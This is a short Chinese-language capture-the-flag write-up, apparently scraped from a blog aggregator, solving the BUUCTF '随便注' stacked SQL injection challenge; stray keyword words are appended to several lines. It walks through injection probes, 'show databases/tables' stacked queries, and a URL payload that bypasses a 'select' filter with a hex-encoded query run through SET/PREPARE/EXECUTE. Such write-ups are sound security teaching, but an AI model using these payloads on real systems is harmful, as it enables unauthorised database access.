堆叠注入——BUUCTF-随便注

时间 2019-11-07

标签堆叠注入 buuctf 随便繁體版

原文原文链接

由题目提示知道，这题须要进行sql注入node

输入1'发现报错sql

再输入1';show batabases#出现了一大堆数据库数据库

再输入1';show tables#出现了两个表编码

猜想flag在这2个表中，输入1';show create table `1919810931114514`;尝试打开表1，发现3d

由于select被过滤了，因此先将select * from `1919810931114514`进行16进制编码blog

再经过构造payload，得http://677a0eb4-6c6d-4514-b3bb-eacb38a3a347.node1.buuoj.cn？inject=1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#table

进而获得flagselect

1. BUUCTF——随便注
2. SQL Injection8(堆叠注入)——强网杯2019随便注
3. 2019强网杯随便注堆叠注入
4. BUUCTF-强网杯-随便注
5. BUUCTF--WEB 随便注 1
6. sql注入 - 堆叠注入
7. sql注入——堆叠注入
8. supersqli--堆叠注入
9. BUUCTF[强网杯 2019]随便注 writeup
10. buuctf 2019强网杯随便注
更多相关文章...
• SQLite 注入 - SQLite教程
• Spring DI（依赖注入）的实现方式：属性注入和构造注入 - Spring教程
• Spring Cloud 微服务实战(三) - 服务注册与发现
• YAML 入门教程